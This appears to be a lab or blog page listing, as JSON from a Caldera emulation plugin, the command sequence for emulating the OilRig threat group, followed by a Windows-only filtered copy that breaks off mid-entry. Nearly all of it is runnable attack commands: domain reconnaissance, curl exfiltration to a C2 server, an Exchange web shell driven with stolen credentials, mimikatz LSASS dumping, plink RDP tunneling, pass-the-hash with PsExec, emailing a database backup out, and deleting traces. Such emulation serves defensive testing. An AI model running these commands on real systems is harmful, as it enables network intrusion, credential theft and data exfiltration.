Adversary: OilRig
Adversary: OilRig
Sequence of commands
1
2
┌──(caldera-env)─(attacker㉿kali)-[~/…/caldera/plugins/emu/data]
└─$ jq '.[] | select(.adversary == "OilRig")' commands-output.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
{
"adversary": "OilRig",
"abilities": [
{
"ability_id": "ed2471a9-1eeb-4787-a5d8-61f66b278a50",
"platform": "windows",
"commands": {
"cmd": "cscript /nologo computername.vbs\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Information Discovery",
"attack_id": "T1082"
},
{
"ability_id": "88378065-bedf-46b9-a8b7-bc5897f4abcb",
"platform": "windows",
"commands": {
"cmd": "cscript /nologo username.vbs\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Owner/User Discovery",
"attack_id": "T1033"
},
{
"ability_id": "0386ef16-757e-425c-8355-88e5be40eb32",
"platform": "windows",
"commands": {
"cmd": "whoami"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Owner/User Discovery",
"attack_id": "T1033"
},
{
"ability_id": "a9861ea9-4f9a-46c9-ba60-15a02806dfdc",
"platform": "windows",
"commands": {
"cmd": "hostname"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Information Discovery",
"attack_id": "T1082"
},
{
"ability_id": "628e8ad3-14af-4670-b797-bcf175a42842",
"platform": "windows",
"commands": {
"cmd": "ipconfig /all"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Network Configuration Discovery",
"attack_id": "T1016"
},
{
"ability_id": "13d5ab62-c05a-4d25-bd8f-e3b27a5be611",
"platform": "windows",
"commands": {
"cmd": "net user /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Account Discovery: Domain Account",
"attack_id": "T1087.002"
},
{
"ability_id": "e0b534a6-bff3-4964-8f7b-863ddee224b0",
"platform": "windows",
"commands": {
"cmd": "net group /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Permission Groups Discovery: Domain Groups",
"attack_id": "T1069.002"
},
{
"ability_id": "3d450711-1062-4276-8bff-bb78ec4f4519",
"platform": "windows",
"commands": {
"cmd": "net group \"domain admins\" /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Permission Groups Discovery: Domain Groups",
"attack_id": "T1069.002"
},
{
"ability_id": "29c018ed-eb3e-4ddb-90ec-ba3d928a00e8",
"platform": "windows",
"commands": {
"cmd": "net group \"Exchange Trusted Subsystem\" /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Permission Groups Discovery: Domain Groups",
"attack_id": "T1069.002"
},
{
"ability_id": "41ce9dd8-dc9f-4fba-8ce9-9ef5aaee3d19",
"platform": "windows",
"commands": {
"cmd": "net accounts /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Password Policy Discovery",
"attack_id": "T1021"
},
{
"ability_id": "821fd81e-2086-4ea6-b792-fb9e044e2323",
"platform": "windows",
"commands": {
"cmd": "net user"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Account Discovery: Local Account",
"attack_id": "T1087.001"
},
{
"ability_id": "ae4e4c08-82cb-4a17-a873-660f851a1a38",
"platform": "windows",
"commands": {
"cmd": "net localgroup administrators"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Permission Groups Discovery: Local Groups",
"attack_id": "T1069.001"
},
{
"ability_id": "cb8e9faa-ac00-48d8-a359-88044a2c0252",
"platform": "windows",
"commands": {
"cmd": "netstat -na"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Network Connections Discovery",
"attack_id": "T1049"
},
{
"ability_id": "de39f574-f6cc-4026-973e-c5370b36220b",
"platform": "windows",
"commands": {
"cmd": "tasklist"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Process Discovery",
"attack_id": "T1057"
},
{
"ability_id": "e6eb7d18-606e-4889-8924-f75cafa92811",
"platform": "windows",
"commands": {
"cmd": "sc query"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Service Discovery",
"attack_id": "T1007"
},
{
"ability_id": "178bb431-4eaf-43b1-922c-f484ab54bbee",
"platform": "windows",
"commands": {
"cmd": "systeminfo"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Information Discovery",
"attack_id": "T1082"
},
{
"ability_id": "09502b3c-7541-4c11-92a9-f55e683a6355",
"platform": "windows",
"commands": {
"cmd": "reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\""
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Query Registry",
"attack_id": "T1012"
},
{
"ability_id": "7971246d-1392-411e-a803-a7946cf9e4d2",
"platform": "windows",
"commands": {
"cmd": "net user #{initial.target.user} /domain\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Account Discovery: Domain Account",
"attack_id": "T1087.002"
},
{
"ability_id": "6a7b4ba0-a9bb-451d-ba9f-d3a2e8a82ffe",
"platform": "windows",
"commands": {
"cmd": "net group \"SQL Admins\" /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Permission Groups Discovery: Domain Groups",
"attack_id": "T1069.002"
},
{
"ability_id": "f9f1bd68-ec0a-47e7-8645-210844190d92",
"platform": "windows",
"commands": {
"cmd": "nslookup #{second.target.host}\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Remote System Discovery",
"attack_id": "T1018"
},
{
"ability_id": "a23fb84f-dfb7-4d07-a6ec-0352ae983651",
"platform": "windows",
"commands": {
"cmd": "C:\\Users\\#{initial.target.user}\\AppData\\local\\SystemFailureReporter\\b.exe\n"
},
"privilege": "Unknown",
"tactic": "credential-access",
"technique": "Credentials from Password Stores: Windows Credential Manager",
"attack_id": "T1555.004"
},
{
"ability_id": "021245dd-c0be-4900-bd6c-1c680f00a237",
"platform": "windows",
"commands": {
"cmd": "curl -F \"data=@C:\\Users\\#{initial.target.user}\\AppData\\Roaming\\fsociety.dat\" --header \"X-Request-ID: #{initial.target.user}-#{paw}\" #{server}/file/upload\n"
},
"privilege": "Unknown",
"tactic": "exfiltration",
"technique": "Exfiltration Over C2 Channel",
"attack_id": "T1041"
},
{
"ability_id": "2f3be960-5c00-4f03-a9c2-da09c31d38d9",
"platform": "windows",
"commands": {
"cmd": "copy C:\\Users\\#{initial.target.user}\\AppData\\Local\\SystemFailureReporter\\contact.aspx C:\\Users\\Public\\contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Ingress Tool Transfer",
"attack_id": "T1105"
},
{
"ability_id": "7aaecfb7-a1eb-477c-8d53-ab3009389623",
"platform": "windows",
"commands": {
"cmd": "copy C:\\Users\\Public\\contact.aspx \"\\\\#{second.target.ip}\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\ClientAccess\\exchweb\\ews\\\"\n"
},
"privilege": "Unknown",
"tactic": "persistence",
"technique": "Server Software Component: Web Shell",
"attack_id": "T1505.003"
},
{
"ability_id": "5f7dc4b3-1287-4a25-b0b0-b6e73756cc11",
"platform": "windows",
"commands": {
"cmd": "attrib +h \"\\\\#{second.target.ip}\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\ClientAccess\\exchweb\\ews\\contact.aspx\""
},
"privilege": "Unknown",
"tactic": "defense-evasion",
"technique": "Hide Artifacts: Hidden Files & Directories",
"attack_id": "T1082"
},
{
"ability_id": "87d3322b-a435-47b5-9f97-a8db4f86dad5",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST --data \"pro=cmd.exe\" --data \"cmd=whoami\" https://#{second.target.ip}/ews/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Owner/User Discovery",
"attack_id": "T1033"
},
{
"ability_id": "48927544-5a18-11ed-9b6a-0242ac120002",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST --data \"pro=cmd.exe\" --data \"cmd=ipconfig /all\" https://#{second.target.ip}/ews/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Network Configuration Discovery",
"attack_id": "T1016"
},
{
"ability_id": "5c279562-a004-4d9c-9ec6-a7dc4997f699",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST --data \"pro=cmd.exe\" --data \"cmd=netstat -an\" https://#{second.target.ip}/ews/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Network Connections Discovery",
"attack_id": "T1049"
},
{
"ability_id": "f96e8195-8b0f-4b87-bdce-748dfda2861f",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST -F \"upl=f1\" -F 'sav=C:\\Windows\\temp\\' -F \"vir=false\" -F \"nen=m64.exe\" -F 'f1=@m64.exe' https://#{second.target.ip}/EWS/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Ingress Tool Transfer",
"attack_id": "T1105"
},
{
"ability_id": "f01e86f9-0b66-4191-beee-324c380690df",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST --data \"pro=cmd.exe\" --data \"cmd=C:\\Windows\\Temp\\m64.exe privilege::debug sekurlsa::logonPasswords exit 1> C:\\Windows\\Temp\\01.txt\" https://#{second.target.ip}/ews/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "credential-access",
"technique": "OS Credential Dumping: LSASS Memory",
"attack_id": "T1003.001"
},
{
"ability_id": "845d36f1-13b6-4d42-a384-aa2f4af9bc27",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST -o 01.txt --data 'don=c:\\windows\\temp\\01.txt' https://#{second.target.ip}/EWS/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "exfiltration",
"technique": "Exfiltration Over C2 Channel",
"attack_id": "T1041"
},
{
"ability_id": "6482ba12-fa47-409c-bab8-704de6475e38",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST --data \"pro=cmd.exe\" --data \"cmd=del C:\\windows\\temp\\01.txt C:\\windows\\temp\\m64.exe\" https://#{second.target.ip}/EWS/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "defense-evasion",
"technique": "Indicator Removal on Host: File Deletion",
"attack_id": "T1070.004"
},
{
"ability_id": "f3df5a83-2a5a-4277-8763-8fb51032d3fc",
"platform": "windows",
"commands": {
"cmd": "copy C:\\Users\\#{initial.target.user}\\AppData\\Local\\SystemFailureReporter\\plink.exe C:\\Users\\Public\\Downloads\\plink.exe\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Ingress Tool Transfer",
"attack_id": "T1105"
},
{
"ability_id": "212995b5-acfc-404b-b3a9-a19cc0afa9a5",
"platform": "windows",
"commands": {
"proc": "exec-background C:\\Users\\Public\\Downloads\\plink.exe -no-antispoof -ssh -N -R #{caldera.server.ip}:13389:#{second.target.ip}:3389 -l #{caldera.user.name} -pw \"#{caldera.user.password}\" #{caldera.server.ip}\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Protocol Tunneling",
"attack_id": "T1572"
},
{
"ability_id": "dc2efbdd-3ab4-44a0-9839-385540b8a8cc",
"platform": "linux",
"commands": {
"proc": "exec-background xfreerdp /u:'#{network.domain.name}\\#{initial.target.user}' /p:'#{initial.target.password}' /v:localhost:13389 /cert-ignore\n"
},
"privilege": "Unknown",
"tactic": "lateral-movement",
"technique": "Remote Services: Remote Desktop Protocol",
"attack_id": "T1021.001"
},
{
"ability_id": "5cb977ae-87c8-450f-b016-f414b42ba60f",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST -F \"upl=f1\" -F 'sav=C:\\Windows\\System32' -F \"vir=false\" -F \"nen=ps.exe\" -F 'f1=@PsExec.exe' https://#{second.target.host}/ews/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Ingress Tool Transfer",
"attack_id": "T1105"
},
{
"ability_id": "d5b83af2-b79e-438d-acfc-2641282df698",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST -F \"upl=f1\" -F 'sav=C:\\Windows\\Temp' -F \"vir=false\" -F \"nen=Nt.dat\" -F 'f1=@RDAT.exe' https://#{second.target.host}/ews/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Ingress Tool Transfer",
"attack_id": "T1105"
},
{
"ability_id": "98279c81-d5a0-4ec4-9d40-a6e87d1f9bd2",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST -F \"upl=f1\" -F 'sav=C:\\Windows\\System32' -F \"vir=false\" -F \"nen=mom64.exe\" -F 'f1=@m64.exe' https://#{second.target.host}/ews/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Ingress Tool Transfer",
"attack_id": "T1105"
},
{
"ability_id": "44073aa3-70e9-4a48-86b7-c25b6f29c25c",
"platform": "linux",
"commands": {
"sh": "sleep 5;\nrdp_pid=$(pgrep -f \"xfreerdp.*/v:localhost\");\nrdp_window=$(xdotool search --pid \"$rdp_pid\");\nxdotool key --window \"$rdp_window\" Super_L;\nsleep 5; \nxdotool windowactivate --sync \"$rdp_window\" type --delay 200 \"cmd\";\nsleep 3; \nxdotool key --window \"$rdp_window\" Ctrl+Shift+Return;\nsleep 3; \nxdotool key --window \"$rdp_window\" Tab Tab;\nxdotool key --window \"$rdp_window\" Return;\nsleep 3; \nxdotool type --window \"$rdp_window\" 'C:\\Windows\\System32\\mom64.exe \"privilege::debug\" \"sekurlsa::pth /user:#{second.target.user} /domain:#{network.domain.name} /ntlm:#{second.target.ntlm}\"';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3; \nxdotool type --window \"$rdp_window\" 'copy C:\\Windows\\Temp\\Nt.dat \\\\#{third.target.ip}\\C$\\ProgramData\\';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3; \nxdotool type --window \"$rdp_window\" 'C:\\Windows\\System32\\ps.exe \\\\#{third.target.ip} cmd.exe';\nxdotool key --window \"$rdp_window\" Return;\nsleep 5;\n"
},
"privilege": "Unknown",
"tactic": "execution",
"technique": "System Services: Service Execution",
"attack_id": "T1569.002"
},
{
"ability_id": "f1f34439-ca0d-4fe7-99af-a198a29b6a3e",
"platform": "linux",
"commands": {
"sh": "sleep 3;\nrdp_pid=$(pgrep -f \"xfreerdp.*/v:localhost\");\nrdp_window=$(xdotool search --pid \"$rdp_pid\");\nsleep 3; \nxdotool type --window \"$rdp_window\" 'dir \"C:\\Program Files\\Microsoft SQL Server\\\"';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3; \nxdotool type --window \"$rdp_window\" 'dir \"C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Backup\\\"';\nxdotool key --window \"$rdp_window\" Return;\nsleep 4;\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "File and Directory Discovery",
"attack_id": "T1083"
},
{
"ability_id": "885c14a2-bc56-4176-8671-4cb25489ae39",
"platform": "linux",
"commands": {
"sh": "sleep 2;\nrdp_pid=$(pgrep -f \"xfreerdp.*/v:localhost\");\nrdp_window=$(xdotool search --pid \"$rdp_pid\");\nsleep 3; \nxdotool type --window \"$rdp_window\" 'mkdir C:\\Programdata\\Vmware';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3; \nxdotool type --window \"$rdp_window\" 'move C:\\Programdata\\Nt.dat C:\\Programdata\\Vmware\\VMware.exe';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3;\nxdotool type --window \"$rdp_window\" 'cd \"C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Backup\\\"';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3;\nxdotool type --window \"$rdp_window\" 'C:\\ProgramData\\Vmware\\VMware.exe --path=\"sitedata_db.bak\" --to=\"#{exfil.target.email}\" --from=\"#{initial.target.user}@#{network.domain.name}\" --server=\"#{second.target.ip}\" --password='#{initial.target.password}' --chunksize=\"200000\"';\nsleep 1; \nxdotool key --window \"$rdp_window\" Return;\nsleep 15;\n"
},
"privilege": "Unknown",
"tactic": "exfiltration",
"technique": "Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol",
"attack_id": "T1048.003"
},
{
"ability_id": "0c5cf9e2-3152-4b4c-9629-2ed7a00da09d",
"platform": "linux",
"commands": {
"sh": "sleep 3;\nrdp_pid=$(pgrep -f \"xfreerdp.*/v:localhost\");\nrdp_window=$(xdotool search --pid \"$rdp_pid\");\nsleep 3; \nxdotool type --window \"$rdp_window\" 'del C:\\ProgramData\\VMware\\VMware.exe';\nsleep 3; \nxdotool key --window \"$rdp_window\" Return;\nsleep 3; \nxdotool type --window \"$rdp_window\" 'rmdir C:\\ProgramData\\VMware';\nsleep 3; \nxdotool key --window \"$rdp_window\" Return;\nsleep 1;\nxdotool type --window \"$rdp_window\" 'exit';\nxdotool key --window \"$rdp_window\" Return;\nsleep 1;\nxdotool type --window \"$rdp_window\" 'exit';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3;\nxdotool type --window \"$rdp_window\" 'exit';\nxdotool key --window \"$rdp_window\" Return;\nsleep 2;\nxdotool type --window \"$rdp_window\" 'del C:\\Windows\\System32\\mom64.exe C:\\Windows\\temp\\Nt.dat C:\\Windows\\System32\\ps.exe';\nxdotool key --window \"$rdp_window\" Return;\nsleep 2; \nxdotool type --window \"$rdp_window\" 'exit';\nxdotool key --window \"$rdp_window\" Return;\nsleep 2;\n\nkill $(ps aux | grep \"sshd: #{caldera.user.name}\" | grep -v priv | grep -v grep | awk '{print $2}')\n"
},
"privilege": "Unknown",
"tactic": "defense-evasion",
"technique": "Indicator Removal on Host: File Deletion",
"attack_id": "T1070.004"
},
{
"ability_id": "d9c9a941-c0e8-4eed-8cc3-6511ad5b9e15",
"platform": "windows",
"technique": "File and Directory Discovery",
"attack_id": "T1083"
},
{
"ability_id": "885c14a2-bc56-4176-8671-4cb25489ae39",
"platform": "linux",
"commands": {
"sh": "sleep 2;\nrdp_pid=$(pgrep -f \"xfreerdp.*/v:localhost\");\nrdp_window=$(xdotool search --pid \"$rdp_pid\");\nsleep 3; \nxdotool type --window \"$rdp_window\" 'mkdir C:\\Programdata\\Vmware';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3; \nxdotool type --window \"$rdp_window\" 'move C:\\Programdata\\Nt.dat C:\\Programdata\\Vmware\\VMware.exe';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3;\nxdotool type --window \"$rdp_window\" 'cd \"C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Backup\\\"';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3;\nxdotool type --window \"$rdp_window\" 'C:\\ProgramData\\Vmware\\VMware.exe --path=\"sitedata_db.bak\" --to=\"#{exfil.target.email}\" --from=\"#{initial.target.user}@#{network.domain.name}\" --server=\"#{second.target.ip}\" --password='#{initial.target.password}' --chunksize=\"200000\"';\nsleep 1; \nxdotool key --window \"$rdp_window\" Return;\nsleep 15;\n"
},
"privilege": "Unknown",
"tactic": "exfiltration",
"technique": "Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol",
"attack_id": "T1048.003"
},
{
"ability_id": "0c5cf9e2-3152-4b4c-9629-2ed7a00da09d",
"platform": "linux",
"commands": {
"sh": "sleep 3;\nrdp_pid=$(pgrep -f \"xfreerdp.*/v:localhost\");\nrdp_window=$(xdotool search --pid \"$rdp_pid\");\nsleep 3; \nxdotool type --window \"$rdp_window\" 'del C:\\ProgramData\\VMware\\VMware.exe';\nsleep 3; \nxdotool key --window \"$rdp_window\" Return;\nsleep 3; \nxdotool type --window \"$rdp_window\" 'rmdir C:\\ProgramData\\VMware';\nsleep 3; \nxdotool key --window \"$rdp_window\" Return;\nsleep 1;\nxdotool type --window \"$rdp_window\" 'exit';\nxdotool key --window \"$rdp_window\" Return;\nsleep 1;\nxdotool type --window \"$rdp_window\" 'exit';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3;\nxdotool type --window \"$rdp_window\" 'exit';\nxdotool key --window \"$rdp_window\" Return;\nsleep 2;\nxdotool type --window \"$rdp_window\" 'del C:\\Windows\\System32\\mom64.exe C:\\Windows\\temp\\Nt.dat C:\\Windows\\System32\\ps.exe';\nxdotool key --window \"$rdp_window\" Return;\nsleep 2; \nxdotool type --window \"$rdp_window\" 'exit';\nxdotool key --window \"$rdp_window\" Return;\nsleep 2;\n\nkill $(ps aux | grep \"sshd: #{caldera.user.name}\" | grep -v priv | grep -v grep | awk '{print $2}')\n"
},
"privilege": "Unknown",
"tactic": "defense-evasion",
"technique": "Indicator Removal on Host: File Deletion",
"attack_id": "T1070.004"
},
{
"ability_id": "d9c9a941-c0e8-4eed-8cc3-6511ad5b9e15",
"platform": "windows",
"commands": {
"cmd": "del C:\\Users\\gosta\\AppData\\Roaming\\fsociety.dat C:\\Users\\Public\\Downloads\\plink.exe;\n"
},
"privilege": "Unknown",
"tactic": "defense-evasion",
"technique": "Indicator Removal on Host: File Deletion",
"attack_id": "T1070.004"
},
{
"ability_id": "16767c68-a865-46af-a0e4-ff8d742efc3f",
"platform": "windows",
"commands": {
"cmd": "curl -s -H \"KEY:#{server.api.key}\" -H \"Content-Type: application/json\" -X PATCH http://#{caldera.server.ip}:8888/api/v2/agents/#{paw} -d \"{\\\"watchdog\\\":1}\"\n"
},
"privilege": "Unknown",
"tactic": "defense-evasion",
"technique": "Indicator Removal on Host: File Deletion",
"attack_id": "T1070.004"
}
]
}
Filter by platform windows
We filter all abilities by
.platform == "windows":1
jq '.[] | select(.adversary == "OilRig") | .abilities |= map(select(.platform == "windows"))' commands-output.jsonWe obtain:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324
{ "adversary": "OilRig", "abilities": [ { "ability_id": "ed2471a9-1eeb-4787-a5d8-61f66b278a50", "platform": "windows", "commands": { "cmd": "cscript /nologo computername.vbs\n" }, "privilege": "Unknown", "tactic": "discovery", "technique": "System Information Discovery", "attack_id": "T1082" }, { "ability_id": "88378065-bedf-46b9-a8b7-bc5897f4abcb", "platform": "windows", "commands": { "cmd": "cscript /nologo username.vbs\n" }, "privilege": "Unknown", "tactic": "discovery", "technique": "System Owner/User Discovery", "attack_id": "T1033" }, { "ability_id": "0386ef16-757e-425c-8355-88e5be40eb32", "platform": "windows", "commands": { "cmd": "whoami" }, "privilege": "Unknown", "tactic": "discovery", "technique": "System Owner/User Discovery", "attack_id": "T1033" }, { "ability_id": "a9861ea9-4f9a-46c9-ba60-15a02806dfdc", "platform": "windows", "commands": { "cmd": "hostname" }, "privilege": "Unknown", "tactic": "discovery", "technique": "System Information Discovery", "attack_id": "T1082" }, { "ability_id": "628e8ad3-14af-4670-b797-bcf175a42842", "platform": "windows", "commands": { "cmd": "ipconfig /all" }, "privilege": "Unknown", "tactic": "discovery", "technique": "System Network Configuration Discovery", "attack_id": "T1016" }, { "ability_id": "13d5ab62-c05a-4d25-bd8f-e3b27a5be611", "platform": "windows", "commands": { "cmd": "net user /domain" }, "privilege": "Unknown", "tactic": "discovery", "technique": "Account Discovery: Domain Account", "attack_id": "T1087.002" }, { "ability_id": "e0b534a6-bff3-4964-8f7b-863ddee224b0", "platform": "windows", "commands": { "cmd": "net group /domain" }, "privilege": "Unknown", "tactic": "discovery", "technique": "Permission Groups Discovery: Domain Groups", "attack_id": "T1069.002" }, { "ability_id": "3d450711-1062-4276-8bff-bb78ec4f4519", "platform": "windows", "commands": { "cmd": "net group \"domain admins\" /domain" }, "privilege": "Unknown", "tactic": "discovery", "technique": "Permission Groups Discovery: Domain Groups", "attack_id": "T1069.002" }, { "ability_id": "29c018ed-eb3e-4ddb-90ec-ba3d928a00e8", "platform": "windows", "commands": { "cmd": "net group \"Exchange Trusted Subsystem\" /domain" }, "privilege": "Unknown", "tactic": "discovery", "technique": "Permission Groups Discovery: Domain Groups", "attack_id": "T1069.002" }, { "ability_id": "41ce9dd8-dc9f-4fba-8ce9-9ef5aaee3d19", "platform": "windows", "commands": { "cmd": "net accounts /domain" }, "privilege": "Unknown", "tactic": "discovery", "technique": "Password Policy Discovery", "attack_id": "T1021" }, { "ability_id": "821fd81e-2086-4ea6-b792-fb9e044e2323", "platform": "windows", "commands": { "cmd": "net user" }, "privilege": "Unknown", "tactic": "discovery", "technique": "Account Discovery: Local Account", "attack_id": "T1087.001" }, { "ability_id": "ae4e4c08-82cb-4a17-a873-660f851a1a38", "platform": "windows", "commands": { "cmd": "net localgroup administrators" }, "privilege": "Unknown", "tactic": "discovery", "technique": "Permission Groups Discovery: Local Groups", "attack_id": "T1069.001" }, { "ability_id": "cb8e9faa-ac00-48d8-a359-88044a2c0252", "platform": "windows", "commands": { "cmd": "netstat -na" }, "privilege": "Unknown", "tactic": "discovery", "technique": "System Network Connections Discovery", "attack_id": "T1049" }, { "ability_id": "de39f574-f6cc-4026-973e-c5370b36220b", "platform": "windows", "commands": { "cmd": "tasklist" }, "privilege": "Unknown", "tactic": "discovery", "technique": "Process Discovery", "attack_id": "T1057" }, { "ability_id": "e6eb7d18-606e-4889-8924-f75cafa92811", "platform": "windows", "commands": { "cmd": "sc query" }, "privilege": "Unknown", "tactic": "discovery", "technique": "System Service Discovery", "attack_id": "T1007" }, { "ability_id": "178bb431-4eaf-43b1-922c-f484ab54bbee", "platform": "windows", "commands": { "cmd": "systeminfo" }, "privilege": "Unknown", "tactic": "discovery", "technique": "System Information Discovery", "attack_id": "T1082" }, { "ability_id": "09502b3c-7541-4c11-92a9-f55e683a6355", "platform": "windows", "commands": { "cmd": "reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"" }, "privilege": 